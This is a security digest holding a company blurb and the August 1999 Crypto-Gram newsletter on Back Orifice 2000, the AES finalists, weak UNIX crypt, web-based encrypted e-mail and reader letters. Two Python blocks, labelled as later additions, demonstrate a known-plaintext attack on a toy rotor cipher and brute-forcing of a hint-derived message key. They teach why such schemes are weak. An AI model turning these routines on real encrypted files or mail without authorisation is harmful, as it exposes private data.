Securify, the Information Security Group of Kroll-O'Gara is composed of highly regarded industry experts that provide objective information security services to businesses and government agencies. These services include network and system security review and repair, product assessment, the creation and implementation of secure e-commerce sites, architecture and design. They also employ internally developed proprietary software that combines best-of-breed security tools and client information to analyze and assess network security issues as a scientific discipline. Their approach employs standard, well-tested methodology, and treats security as both a business and a technical issue. The Information Security Group is unique in the security field in that it not only provides the assessment and recommendations, but also actual implementation and deployment. For more information, please access their web site at www.securify.com, or contact the company at (650) 812-9400.
Contact Vicki Wu of KVO Public Relations at (650) 919-2027.

About The Kroll-O'Gara Company

The Kroll-O'Gara Company is a leading global provider of a broad range of specialized products and services designed to supply solutions to a variety of security needs. Kroll-O'Gara provides governments, business, and individuals with information, analysis, training, and products to mitigate the growing risks associated with white-collar crimes, fraud, physical attacks, threats of violence, and uninformed decisions based upon incomplete or inaccurate information. The company is organized into four primary business groups: Investigations & Intelligence Group, Security Products & Services Group, Voice and Data Security Group, and the Information Security Group. Based in New York City, New York, and Fairfield, Ohio, Kroll-O'Gara employs more than 2,600 people in 60 offices and plants around the world. For more information, please access the company's web sites at www.securify.com or www.kroll-ogara.com.

@HWA

09.0 CryptoGram Aug 15th '99
~~~~~~~~~~~~~~~~~~~~~~~

From: Bruce Schneier

CRYPTO-GRAM

August 15, 1999

by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below.

Copyright (c) 1999 by Bruce Schneier

CRYPTO-GRAM now has over 20,000 subscribers!

** *** ***** ******* *********** *************

In this issue:
Back Orifice 2000
Counterpane -- Featured Research
News
Counterpane Systems News
NIST AES News
The Doghouse: HPUX and the UNIX Crypt Algorithm
Web-Based Encrypted E-Mail
Comments from Readers

** *** ***** ******* *********** *************

Back Orifice 2000

Back Orifice is a free remote administration tool for Microsoft Windows. It's also one of the coolest hacking tools ever developed.
Back Orifice 2000 (BO2K), released this July, is the current version of the software. It works on Windows 95, Windows 98, and Windows NT. It is much better written than the original Back Orifice. And it's free, and open source.

There are two parts: a client and a server. The server is installed on the target machine. The client, residing on another machine anywhere on the Internet, can then take control of the server.

This is in itself a legitimate requirement. Perfectly respectable programs, like pcAnywhere or Microsoft's own Systems Management Server (SMS), do the same thing. They allow a network administrator to remotely troubleshoot a computer. They allow a remote tech support person to diagnose problems. They are mandatory in many corporate computing environments.

Remote administration tools also have a dark side. If the server is installed on a computer without the knowledge or consent of its owner, the client can effectively "own" the victim's PC.

Back Orifice's difference is primarily marketing spin. Since it is not distributed by a respectable company, it cannot be trusted. Since it was written by hackers, it is evil. Since its malicious uses are talked about more, its benevolent uses are ignored. That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice.

Well, not exactly. Back Orifice was designed by a bunch of hackers with fun in mind. Not only can the client perform normal administration functions on the server's computer -- upload and download files, delete files, run programs, change configurations, take control of the keyboard and mouse, see whatever is on the server's screen -- but it can also do more subversive things: reboot the computer, display arbitrary dialog boxes, turn the microphone or camera on and off, capture keystrokes (and passwords). And there is an extensible plug-in architecture for others to write modules.
(I'm waiting for someone to write a module that automatically sniffs for, and records, PGP private keys.)

Back Orifice is also designed to hide itself from the server's owner. Unless the server's owner is knowledgeable (and suspicious), he will never know that Back Orifice is running on his computer. (Other remote administration tools, even SMS, also have stealth modes; Back Orifice is just better at it.) Anti-virus software has been updated to detect default Back Orifice configurations, but that only solves most of the problem. Because Back Orifice is configurable, because it can be downloaded in source form and then recompiled to look different... I doubt that all variants will ever be discovered.

Okay, so who's to blame here? The Cult of the Dead Cow wrote and released Back Orifice. Surely the world is not a safer place because, as cDc's Sir Dystic put it: "every 14-year-old who wants to be a hacker will try it." BO2K's slogan is "show some control," and many will take that imperative seriously. Back Orifice will be used by lots of unethical people to do all sorts of unethical things. And that's not good.

On the other hand, Back Orifice can't do anything until the server portion is installed on some victim's computer. This means that the victim has to commit a security faux pas before anything else can happen. Not that this is very hard: lots of people connect their computers to the Internet without adequate protection. An attacker can even ask the victim to install Back Orifice (social engineering might help); the Worm.ExploreZip worm of this spring did exactly that. Still, if the victim is sufficiently vigilant, he can never be attacked by Back Orifice.

But what about Microsoft's computing environment? One of the reasons Back Orifice is so nasty is that Microsoft doesn't design its operating systems to be secure. It never has. Any program that runs in Microsoft Windows 95 and 98 can do anything. In Unix, an attacker would first have to get root privileges.
Not in Windows 95 or 98. There's no such thing as limited privileges, or administrator privileges, or root privileges. Microsoft assumes that anyone who can run a program can reformat the hard drive. This might have made some sense in the age of isolated desktop computers; after all, if you could run a program, you were standing in front of the machine. But on the Internet, this is absurd.

Windows NT was designed as a secure operating system, more or less. There are provisions to make Windows NT a very secure operating system, such as separate user accounts with different privilege levels, file permissions, and access control lists on kernel objects. However, the configuration that makes Windows NT secure is very far from the default installed configuration. Microsoft admits this. Starting from the default installation, you have to make 300+ security checks and modifications to Windows NT to make it secure. And on top of this, Microsoft assumes that most users have Administrator access to their desktop machines anyway. They only really worry about network security, not host security, which is where they are seriously vulnerable to attacks like Back Orifice 2000. Windows NT could be secure, but Microsoft refuses to ship the OS in that condition (presumably they worry that their spiffy animated fading menu bars may be overlooked).

Malicious remote administration tools are a major security risk. What Back Orifice has done is make mainstream computer users aware of the danger. Maybe the world would have been safer had they not demonstrated the danger so graphically, but I am not sure. There are certainly other similar tools in the hacker world -- one, called BackDoor-G, has recently been discovered -- some developed with much more sinister purposes in mind. And Microsoft only responds to security threats if they are demonstrated.
Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice, and suddenly they take the vulnerability seriously.

Back Orifice Home Page:
http://www.bo2k.com/

Commentary:
http://www.zdnet.com/zdnn/stories/news/0,4586,2127049,00.html
http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/30/o03-30.36.htm

Microsoft's Systems Management Server:
http://www.microsoft.com/smsmgmt/techdetails/remote.asp

Cult of the Dead Cow press release:
http://www.cultdeadcow.com/news/pr19990719.html

BackDoor-G:
http://www.zdnet.com/zdnn/stories/news/0,4586,2267379,00.html

** *** ***** ******* *********** *************

Counterpane -- Featured Research

"Notes on the Design and Analysis of the Yarrow Cryptographic Pseudorandom Number Generator"
J. Kelsey, B. Schneier, and N. Ferguson, Sixth Annual Workshop on Selected Areas in Cryptography, Springer-Verlag, August 1999, to appear.

We describe the design of Yarrow, a family of cryptographic pseudo-random number generators (PRNGs). We describe the concept of a PRNG as a separate cryptographic primitive, and the design principles used to develop Yarrow. We then discuss the ways that PRNGs can fail in practice, which motivates our discussion of the components of Yarrow and how they make Yarrow secure. Next, we define a specific instance of a PRNG in the Yarrow family that makes use of available technology today.

http://www.counterpane.com/yarrow-notes.html

** *** ***** ******* *********** *************

News

Major irony alert: President Clinton signs a bill into law using PGP.
http://www.wired.com/news/news/politics/story/20775.html

A new U.K. bill on e-commerce has the nasty provision that police will be able to demand access to encryption keys if they suspect criminal use of the Internet. Those who refuse get a two-year prison sentence.
http://www.wired.com/news/news/politics/story/20937.html
http://techweb.com/news/story/TWB19990726S0010
Text of the bill:
http://www.dti.gov.uk/cii/elec/ecbill.html
Foundation for Information Policy Research commentary on the bill:
http://www.fipr.org/ecommpr.html

The first three chapters of Alan Turing's treatise on the Enigma, retyped from the only known paper copy, are available at:
http://home.cern.ch/~frode/crypto/Turing/index.html

The L0pht has released an anti-sniffer tool. It detects sniffers on networks. Unfortunately, at least one sniffer-detection-resistant sniffer has already been released. And the race continues....
http://www.wired.com/news/news/technology/story/20913.html
L0pht:
http://www.l0pht.com/

The Information Society, an academic journal, published a special issue on anonymity and the Internet: vol. 15, no. 2. Actually, there are interesting articles in most of the back issues.
http://www.slis.indiana.edu/TIS/tables_of_contents/toc.html

The Encrypting File System (EFS) built into Microsoft Windows 2000 has been broken.
http://www.ntsecurity.net/forums/2cents/news.asp?IDF=118&TB=news
Microsoft claims that it has not, and that the attack is predicated on the user doing something wrong: leaving the EFS recovery key on the machine.
http://www.microsoft.com/security/bulletins/win2kefs.asp
The author's reply:
http://www.ntsecurity.net/forums/2cents/GetMessage.asp?RootID=2092&ID=2102&IDF=118&TB=news
I reserve judgment, not having studied EFS, the attack, or Microsoft's response.

In late May, Janet Reno wrote to German Federal Minister of Justice Herta Daubler-Gmelin, asking her to control the distribution of encryption software over the Internet.
http://www.heise.de/tp/deutsch/inhalt/te/5117/2.html

There's another version of Melissa floating around. This one uses the ".all" extensions in Microsoft Outlook to crash systems. Clever idea, actually.
http://www.computerworld.com/home/print.nsf/all/990719B50A

This rather impressive espionage device is being sold as a home consumer item:
http://www.x10.com/home/offer.cgi?!ZDX30,../1index761.htm

There has been considerable hoo-hah over a U.S. government plan to monitor private networks for intrusion, and invade a lot of privacy in the process. (This will all be with the consent of the various companies, so warrants are not required.) It's called Fidnet, for Federal Intrusion Detection Network.
http://www12.nytimes.com/library/tech/99/07/biztech/articles/28compute.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2304083,00.html?chkpt=hpqs014
http://www.sjmercury.com/svtech/news/indepth/docs/secure072999.htm
http://techweb.com/wire/story/TWB19990729S0013
http://www.fcw.com/pubs/fcw/1999/0726/web-plan-7-29-99.html
http://www.infoworld.com/cgi-bin/displayStory.pl?990730.enstarwars.htm
EPIC's "Critical Infrastructure Protection and the Endangerment of Civil Liberties":
http://www.epic.org/security/infowar/epic-cip.html
Copy of the White House plan, and commentary:
http://www.cdt.org/policy/terrorism/fidnet/
The House Appropriations Committee has approved a $36 billion budget for the departments of Justice, Commerce and State, but included language specifically barring any spending on FIDNET.
http://www.techweb.com/wire/story/reuters/REU19990730S0005
And the U.S. government backpedals.
http://www.fcw.com/pubs/fcw/1999/0802/fcw-newssecurityside-08-02-99.html

AOL has been hit by an ingenious social engineering attack. This hoax message, masquerading as a hoax warning, fools users into giving up account and credit card information.
http://www.zdnet.com/zdnn/stories/news/0,4586,2303536,00.html

The FBI is preventing CMI Communications, a Canadian company, from offering satellite phone service in the U.S. because the FBI can't eavesdrop on the calls.
http://www.nationalpost.com/financialpost.asp?f=990716/29896.html

California adopted a new digital signature law, allowing brokerages to use signed e-mail for contracts.
http://www.computerworld.com/home/news.nsf/all/9907294dig

The case against Kevin Mitnick has finally been dropped.
http://www.msnbc.com/news/178825.asp

Congressman Porter Goss (R-Fla.) wants to offer a tax break to companies that develop encryption products that enable key recovery or other methods of giving the government access to the encryption keys.
http://www.wired.com/news/news/politics/story/21014.html

A new Excel vulnerability allows a malicious spreadsheet to execute arbitrary code without the user's permission.
http://www.securityportal.com/list-archive/bugtraq/1999/Jul/0268.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2305495,00.html?chkpt=hpqs014
http://officeupdate.microsoft.com/Articles/mdac_typ.htm

The Ontario Information and Privacy Commissioner has published a pamphlet that recommends that anyone using e-mail learn to understand and use encryption.
http://www.ipc.on.ca/Web_site.ups/MATTERS/SUM_PAP/PAPERS/encrypt.htm

And one last Microsoft item. To help salvage their reputation, Microsoft put a server running a beta of Windows 2000 outside its firewall and dared hackers to break in. The problem was that the server couldn't stay up long enough for anyone to even try.
http://www.zdnet.com/zdnn/stories/news/0,4586,2309474,00.html?chkpt=hpqs014
http://www.windows2000test.com/

** *** ***** ******* *********** *************

Counterpane Systems News

Counterpane Systems has changed its name to Counterpane Internet Security, Inc. We have received venture-capital funding from Accel Partners and Bessemer Ventures, and are in the process of creating a series of service offerings in the managed security area. Anyone interested in working for Counterpane in the Bay Area should contact me immediately. Watch this space for more details.
This is going to be the coolest security company you've ever seen.

PasswordSafe wins PC Magazine Editors' Choice award:
http://www.zdnet.com/pcmag/stories/reviews/0,6755,2311193,00.html

Bruce Schneier profiled on guru.com:
http://www.guru.com/profiles_schneier.html

Microsoft PPTP's vulnerability discussed:
http://www.zdnet.com/sr/stories/news/0,4538,2293711,00.html

Bruce Schneier will be speaking at the Scandinavian Network Expo, in the evening on 14 September and then on 15 September:
http://www.networkstelecom.com/index_eng.html
http://www.firedoor.se/bruce/bruce.var

** *** ***** ******* *********** *************

NIST AES News

AES is the Advanced Encryption Standard, the encryption algorithm that will eventually replace DES. In 1997, the U.S. government (NIST, actually) solicited candidate algorithms for this standard. By June 1998 (the submission deadline), NIST had received fifteen submissions. NIST asked for comments on these algorithms, with the intention of pruning the list to five finalists. NIST held an AES conference in Rome in April (this was the second AES conference; the first was the previous August in California), the comment deadline was in June, and last Monday NIST announced the finalists. They are:

Mars, submitted by a large team at IBM.
RC6, from RSA Data Security (including Ron Rivest).
Rijndael, from a team of excellent Belgian cryptographers.
Serpent, by three very respected cryptographers, Ross Anderson, Eli Biham, and Lars Knudsen.
Twofish, from Counterpane Systems, including myself.

NIST didn't just announce the five finalists. They published a 52-page report explaining their rationale -- why they chose the algorithms they did and why they did not choose the algorithms they didn't -- and it is worth reading to peek at their decision process. It's at
http://csrc.nist.gov/encryption/aes/round2/round2.htm#NIST

The next step is to choose among the finalists.
NIST is again soliciting comments on the algorithms, and there will be a third AES Candidate Conference in New York in April 2000, held in conjunction with the 7th Fast Software Encryption workshop. Comments are due by 15 May 2000, and then NIST will propose a standard. The AES will then go through the formal government approvals process and become a Federal Information Processing Standard (FIPS), and presumably will become the standard encryption algorithm for all sorts of international applications. Expect all this to happen by the summer of 2001; the government moves slowly.

Cryptographers are busily analyzing the submissions for security. It's tempting to think of the process as a big demolition derby: everyone submits their algorithms and then attacks all the others... the last one standing wins. Really, it won't be like that. At the end of the analysis period, I don't expect serious weaknesses to be found in any of the finalists. The winner will be chosen based on other factors: performance, flexibility, suitability.

This means that we need your input into this process. I know you're not cryptographers, and you won't be able to comment on the mathematics of the various submissions. But you can comment on your encryption requirements, and whether the algorithms will suit your needs. AES will have to work in a variety of current and future applications, doing all sorts of different encryption tasks: 32-bit microprocessors, 64-bit microprocessors, small 8-bit smart cards, DSPs, FPGAs, custom ASICs, and everything else we can't even imagine yet. Choosing a single algorithm for all these applications is not easy, but that's what we have to do. It might make more sense to have a family of algorithms, each tuned to a particular application, but there will be only one AES. And when AES becomes a standard, customers will want their encryption products to be "buzzword compliant."
They'll demand it in hardware, in desktop computer software, on smart cards, in electronic-commerce terminals, and other places we never thought it would be used. Anything we pick for AES has to work in all those applications.

So how do you comment? NIST is accepting formal comments either on paper or by e-mail. See http://www.nist.gov/aes for instructions. Be sure to identify who you represent and what cryptography interests you have. Remember, AES is going to be your cryptography standard for the 21st century. We need your help.

NIST Round 2 page:
http://csrc.nist.gov/encryption/aes/round2/round2.htm
FSE 2000:
http://www.counterpane.com/fse.html
Performance comparison of AES candidates:
http://www.counterpane.com/aes-performance.html
A version of this essay appears at:
http://www.zdnet.com/zdtv/cybercrime/features/story/0,3700,2312895,00.html

** *** ***** ******* *********** *************

The Doghouse: HPUX and the UNIX Crypt Algorithm

Here is a comparison of the Solaris and HPUX man pages for the UNIX "crypt" file-encryption command (crypt(1), not the crypt(3) password-hashing function). Same algorithm, different interpretations, different conclusions.

According to the Solaris 2.6 crypt man page, "crypt implements a one-rotor machine designed along the lines of the German Enigma, but with a 256-element rotor. Methods of attack on such machines are widely known, thus crypt provides minimal security."

According to the HPUX 10.20 man page, "crypt implements a one-rotor machine designed along the lines of the German Enigma, but with a 256-element rotor. Methods of attack on such machines are known, but not widely; moreover the amount of work required is likely to be large."

Reading the HPUX man page, you get the impression that crypt offers adequate protection for your files. It is a sad statement when cryptographic algorithms that are broken as homework for cryptography students are put forward as a means to protect data by a mainstream OS vendor.
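To make the Doghouse point concrete, here is an added example (written for this digest; it is not code from Crypto-Gram and not any vendor's crypt(1)): a toy one-rotor machine of the same family, a 256-element rotor that steps one position per byte, together with the textbook known-plaintext attack on it. The key derivation, the sample key and both sample messages are constructed for the illustration. The real crypt(1) adds a reflector and builds its rotor from the key differently, but the attack never needs to know how the rotor was built: each known plaintext byte exposes one wire, and a few hundred bytes of known text (a man page, a mail header) expose the whole rotor, after which every other file encrypted under the same key reads in the clear.

```python
import hashlib
import random

ALPHABET = 256


def make_rotor(key: bytes) -> list:
    """Derive a 256-element rotor (a permutation of 0..255) from the key.

    Constructed for this toy: a hash of the key seeds a shuffle.  crypt(1)
    seeds its rotor differently, which does not matter to the attack below.
    """
    seed = int.from_bytes(hashlib.sha256(key).digest(), "big")
    rotor = list(range(ALPHABET))
    random.Random(seed).shuffle(rotor)
    return rotor


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    """One-rotor machine: the rotor advances one step per byte, so byte i
    enters the wiring at offset (p + i) and leaves with offset i removed."""
    rotor = make_rotor(key)
    return bytes((rotor[(p + i) % ALPHABET] - i) % ALPHABET
                 for i, p in enumerate(plaintext))


def decrypt(key: bytes, ciphertext: bytes) -> bytes:
    """Inverse of encrypt: walk the inverse permutation with the same offsets."""
    rotor = make_rotor(key)
    inverse = [0] * ALPHABET
    for position, wire in enumerate(rotor):
        inverse[wire] = position
    return bytes((inverse[(c + i) % ALPHABET] - i) % ALPHABET
                 for i, c in enumerate(ciphertext))


def recover_wiring(known_plaintext: bytes, known_ciphertext: bytes) -> dict:
    """Known-plaintext attack.  Each (p_i, c_i) pair exposes one wire:
    rotor[(p_i + i) % 256] == (c_i + i) % 256.  The key is never needed."""
    wiring = {}
    for i, (p, c) in enumerate(zip(known_plaintext, known_ciphertext)):
        wiring[(p + i) % ALPHABET] = (c + i) % ALPHABET
    return wiring


def decrypt_with_wiring(wiring: dict, ciphertext: bytes,
                        unknown: int = ord("?")) -> bytes:
    """Read another message under the same key using only recovered wires.
    Bytes whose wire was never observed come out as '?'."""
    inverse = {wire: position for position, wire in wiring.items()}
    out = bytearray()
    for i, c in enumerate(ciphertext):
        position = inverse.get((c + i) % ALPHABET)
        out.append(unknown if position is None else (position - i) % ALPHABET)
    return bytes(out)


def demo() -> dict:
    """Constructed scenario: the attacker holds one file in both clear and
    encrypted form and a second file encrypted under the same key."""
    key = b"correct horse"                                          # constructed key
    known = b"The quick brown fox jumps over the lazy dog. " * 200  # constructed known text
    secret = b"Payroll export: Q3 bonuses approved, see attached ledger."  # constructed target
    wiring = recover_wiring(known, encrypt(key, known))
    recovered = decrypt_with_wiring(wiring, encrypt(key, secret))
    return {"wires_known": len(wiring), "target": secret, "recovered": recovered}


if __name__ == "__main__":
    result = demo()
    print(f"rotor wires recovered: {result['wires_known']}/256")
    print(result["recovered"].decode(errors="replace"))
```

The machine restarts at rotor position 0 for every file and has no per-file randomisation, which is why wiring learned from one file carries over to every other file under that key; that, not the rotor size, is the "widely known method of attack" the Solaris man page is alluding to.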
** *** ***** ******* *********** *************

Web-Based Encrypted E-Mail

The idea is enticing. Just as you can log onto Hotmail with your browser to send and receive e-mail, there are Web sites you can log on to to send and receive encrypted e-mail: HushMail, ZipLip, YNN-mail, ZixMail. No software to download and install... it just works. But how well?

HushMail is basically a PGP- or S/MIME-like e-mail application that uses Java (although, oddly enough, HushMail is compatible with neither). The sender logs onto the HushMail Web site and encrypts messages using a Java applet that is automatically downloaded onto his machine. Both the sender and receiver need to have HushMail accounts for this to work. Accounts can be anonymous. The algorithms are 1024-bit ElGamal for key exchange and signatures, and Blowfish for bulk encryption.

But everyone's private key is stored on the HushMail server, protected by a passphrase. This means that one weak link is likely to be the passphrase; it's the only protection you have against someone who has legal or illegal access to the HushMail server. (The current beta -- August 99 -- doesn't let you change your passphrase, although they promise the feature in the future.)

Another weak link is the Java applet. When you download it, you have no idea whether it is the correct applet. Yes, the source code is public, but that doesn't help when you are at a public Internet terminal trying to encrypt or decrypt private e-mail. A Trojaned Java applet can do all sorts of damage, and there is no way to know. Sure, you use an SSL connection between your computer and the HushMail server, but if you don't actually check the details of the received certificate, you have no idea who you are connected to. HushMail is considering writing something to verify the applet automatically, but then how do you trust the verifier? This is actually a major problem. The applet can be signed, but who signed it?
Even if you check the certificate, the typical browser trusts a dozen different PKI roots by default, and any one of them can issue a forged certificate. This means you have to trust them all. And you have to trust that a Trojan didn't drop a phony root certificate into your browser. Note that a downloaded verifier can never solve this problem; it just turns the "how do I trust the applet" question into "how do I trust the verifier."

And a third possible weakness is the location of the HushMail servers. Although the company is based in Antigua, the servers are located in Canada. Presumably Canada is more susceptible to legal attacks. And remember that the security depends on the physical protection of the HushMail server.

All in all, though, HushMail seems like a reasonable implementation of the idea. The company seems clued; they have a reasonably informative Web site, and respond promptly to security questions.

ZipLip is different. It does not require both parties to have an account. The sender logs onto the ZipLip Web site and, using SSL, sends a message to someone else. ZipLip then sends the recipient a message telling him that a message is waiting. The recipient then logs onto ZipLip to receive it. Encryption, outside the two SSL connections, is completely optional. ZipLip won't identify the encryption algorithm used, which is enough to discount them without further analysis. But they do something even stupider: they allow the sender to create an encryption key and then give the recipient a "hint" so that he can guess it. ZipLip's own Web site suggests: "The name of the project we're working on," or "The restaurant where we had dinner last night." Maybe there are 100,000 restaurants, so that's a 17-bit key (log2 of 100,000 is about 16.6).

The threats here are serious. Both the sender and receiver need to verify their SSL connections, otherwise there is no security.
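As an added illustration of the "17-bit key" arithmetic above (example code written for this digest, not ZipLip's, whose algorithm is undisclosed): a message whose key the recipient is meant to guess from a hint falls to anyone who holds the ciphertext and a list of candidate answers, and the work factor is the size of that list, not the size of the key. The cipher here is a toy SHA-256 keystream so the block runs offline; the restaurant list, the message and the key-derivation rule are all constructed for the example.

```python
import hashlib
import math


def key_from_answer(answer: str) -> bytes:
    """Derive the message key from the 'hint' answer, normalised the way a
    recipient typing it in would expect.  Constructed rule for this example."""
    return hashlib.sha256(answer.strip().lower().encode("utf-8")).digest()


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy stream cipher: SHA-256(key || counter) blocks XORed over the data.
    Symmetric, so the same call encrypts and decrypts."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def effective_key_bits(candidate_count: int) -> float:
    """A key the recipient can guess from a hint is only as strong as the
    number of answers the hint admits: log2(100000) is about 16.6 bits."""
    return math.log2(candidate_count)


def looks_like_text(data: bytes) -> bool:
    """Cheap plaintext oracle: a wrong key yields pseudo-random bytes, which
    are essentially never all printable ASCII for a message this long."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def guess_message_key(ciphertext: bytes, candidate_answers) -> tuple:
    """Offline attack by whoever holds the ciphertext (the server, or anyone
    who copied its spool): try every candidate answer in turn.
    Returns (answer, plaintext, attempts), or (None, None, attempts)."""
    attempts = 0
    for answer in candidate_answers:
        attempts += 1
        plaintext = keystream_xor(key_from_answer(answer), ciphertext)
        if looks_like_text(plaintext):
            return answer, plaintext, attempts
    return None, None, attempts


def demo() -> dict:
    """Constructed scenario: the sender keys the message to 'the restaurant
    where we had dinner last night'; the attacker has a list of restaurants."""
    message = b"Wire the deposit to account 4471 before Friday."  # constructed
    sender_answer = "Chez Panisse"                                  # constructed
    ciphertext = keystream_xor(key_from_answer(sender_answer), message)
    # Constructed candidate list; a real attacker would use a city directory.
    restaurants = ["Zuni Cafe", "Tadich Grill", "House of Nanking",
                   "Greens", "chez panisse", "Slanted Door"]
    answer, plaintext, attempts = guess_message_key(ciphertext, restaurants)
    return {"answer": answer, "plaintext": plaintext, "attempts": attempts,
            "bits_for_100k": effective_key_bits(100_000)}


if __name__ == "__main__":
    result = demo()
    print(f"recovered after {result['attempts']} guesses: {result['answer']!r}")
    print(f"100,000 candidates is {result['bits_for_100k']:.1f} bits of key")
```

Nothing about the cipher matters here: swap in Blowfish or AES and the attacker still needs at most one trial per candidate answer, because the hint, not the algorithm, bounds the key space.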
The ZipLip server is a major attack target, both because many messages will not be encrypted, and because those that are will have keys weakened by the requirement that both parties remember them. On the plus side, ZipLip claims a policy of deleting all mail 24 hours after delivery, which provides a level of lawyer-proofing that HushMail does not have... if they implement it properly.

YNN-mail is barely worth this paragraph. They encrypt stored messages with a 40-bit key, and don't use SSL when you sign up and send them a long-term password. Snake oil if I've ever seen it.

And I just heard of another, ZixMail. I didn't have time to examine it in depth, but the FAQ -- look at their wishy-washy comments on encryption -- makes it sound like real snake oil, too.

Web-based encrypted e-mail is less secure than PGP-encrypted e-mail (or S/MIME e-mail) for a few reasons. One, the constant interaction between the communicants and the server leaves more opportunity for man-in-the-middle attacks, Trojan horses, etc. Two, SSL-based authentication is more vulnerable to spoofing, since almost no one ever bothers to check the details of received certificates and there is no revocation mechanism in place. And three, there are some very attractive attack targets: servers with large collections of secret e-mail and potential decryption keys. Certainly Web-based encrypted e-mail is better than unencrypted e-mail, but I'd stick with PGP or S/MIME if possible.

This essay was written with input from Fred Wamsley.

A version of this essay appears at:
http://www.zdnet.com/zdnn/stories/comment/0,5859,2314064,00.html

** *** ***** ******* *********** *************

Comments from Readers

From: "Couvares, Peter F."
Subject: Crypto-Hacking

For all it's worth, it looks like you were beaten to the punch -- I can find at least four prior uses of "crypto-hacking" or "cryptohacking".
Google turned up the following, among others:
http://cc2.gamestats.com/wwwboard/messages/894.html
http://www.hotwired.com/talk/club/special/transcripts/96-03-13.levy.html

All of them seem to use it to mean hacking a system that employs cryptography rather than hacking cryptography itself, however -- your definition is a more useful contribution to the vocabulary.

From: John Savard
Subject: Cluelessness Alert.

I'm not so sure. I certainly do agree that the military can safely allow public information to be stored on Web sites on commercial hosts. However, I have noted that a lot of military sites are actually on U.S. Government-owned machines in the .mil domain. And it is difficult, particularly using common commercially-available operating systems and Internet hosting software, to maintain the kind of impregnable security needed for any system that also contains sensitive information.

There are ways of making an Internet server essentially immune to most kinds of hacking. Macintosh servers, not having a CLI, appear to be quite secure. But there are other techniques, most of which require custom software and even custom hardware.

For example, to take an idea from the telephone company, how about a computer with two CPUs. CPU number 1 is connected to the hard drive containing the software for the computer, and has read-write access to all of RAM. CPU number 2 is the one connected to the network. It has read-only access to the chunk of memory from which it runs programs. But it has read-write memory for storing data, and read-only access to a hard drive containing the Web site it is to present to the Internet. If it also has data to store, it gets write access to a hard drive for that purpose. The access is determined by *hardwired connections*, not by operating system privileges which can be subverted.
In most operating systems, either the Microsoft ones or the Unix clones, networking is part of the operating system, and the TCP/IP connection to the Internet is part of that network. It has to be explicitly limited in its privileges, and if someone gets Administrator privileges/root access, that can be overturned. That shouldn't happen, but any bug in the OS is a possible back door.

Now, suppose instead that the OS didn't even HAVE networking in it. The port connected to the Internet was something the OS didn't even know about, and everything that port did was under the control of one unprivileged *applications program*. Even if the OS didn't even have security -- say it was MS-DOS -- with precautions against such attacks as buffer overrun, an applications program with narrowly focussed capabilities could be quite secure.

If one doesn't go to these kinds of lengths, though, while it is true that constant vigilance and the use of more conventional security methods (i.e. firewalls) can give "pretty good" security, I think the Pentagon is entirely justified in taking the attitude that the kind of *ironclad* security they need just isn't available if one connects to the Internet.

I'm quite sure that the NSA or whoever could come up with a "super-firewall" that could act as a public Web-site host, and yet be updated from within a highly sensitive computer network, with safety. But it would take technologies like the two-CPU sketch above, which just aren't available off the shelf. And it's off-the-shelf technologies that have been used for much of the military's Internet presence.

So while it is true there is a way for the military to stay on-line and maintain security, it is also true that that is not immediately available. Taking some Web sites off-line until the vulnerabilities can be remedied isn't a silly policy, even if there may be some individual examples of cluelessness where sites involving no exposure are taken down.
From: dragon@revealed.net
Subject: Re: Major cluelessness alert

I just read your blurb on the Army's consideration of pulling off of the net, and I felt I had to comment. In particular, I disagree with the page which you felt had "a good analysis of this idiotic idea". While I agree that a simple knee-jerk reaction to shut off the Internet connection just because X company did so is not prudent, I do believe that, in an organization with an educated security staff, there is a place for a temporary shut-down of the connection.

In particular, I was involved in making this decision for one of the companies I work with, and we were concerned with two points: 1) since Melissa was propagating via e-mail with little human intervention, we decided to cut off access until we had gotten enough control on our internal population to not propagate to our business partners in the way that other large companies had done to us, and 2) to give our admins the breathing room to be able to rationally understand what the impact on our production systems was and to implement the updates/fixes that were coming to us from our suppliers.

I don't know how anyone can say that it's idiotic to disconnect from the Internet when in the face of an attack which is both significant in scope and relatively unknown in implementation. Yes, it could be considered to be paranoid, xenophobic, and reactionary, and it's true that it is not necessarily any safer to be connected on any other day, but to deny a security staff the ability to raise the drawbridge until the immediate threat is at least understood hoodwinks us to the point that we won't really be able to function.

Finally, I have to say that I agree with at least a part of the military's decision to pull back. The one thing that they mentioned was that they were attempting to correct the positioning of sensitive data. There is a lot of information, military or otherwise, that has no place on the public Internet.
The running joke in our department is that the only secure computer is one that is powered off, melted into slag, encased in concrete, and buried at the bottom of the ocean. Your own writings show that not even cryptography is completely reliable due to advances in mathematics and side-channel attacks. There are many, many circumstances where the sensitivity and criticality of data demands location on a network that is air-gap protected from others, whether those other networks are the public Internet, less-secure Intranets, or private WANs connecting to suppliers and dealers. The real idiocy is placing data which needs to be kept secure on machines which are accessible via public, or near-public, channels.

From: Jon Williams
Subject: Cracking Encrypted ZIP files

Regarding encrypted ZIP file cracking: While brute forcing the password may work most of the time for most people and take less time, there is also a known-plaintext attack, which only requires 13 known bytes. Check out http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html for a whitepaper describing the attack and working software. I've successfully used this.

From: "David Brownell"
Subject: SSL at Wells Fargo

Wells Fargo's on-line banking site is still using SSL v2 ... doesn't support browsers configured to use more secure versions (v3, TLS) and has even rejected SSL v2 connections that don't use RC2 (deprecated). I'm sure you understand the SSLv2/RC2 issues, even when 128-bit keys are in use; they're just not as strong as other protocols/ciphers, at least for the front-door sorts of attacks that were NOT your point. The "simple" bungle on their site, however, is that if you've adopted a policy that you're not going to use SSLv2 for "secure" transactions, the Wells Fargo site says to you that your browser isn't secure enough, and you need to get a 128-bit browser. Doesn't say "you must enable an obsolescent version with a dubious cipher" ... which it could say, very easily.
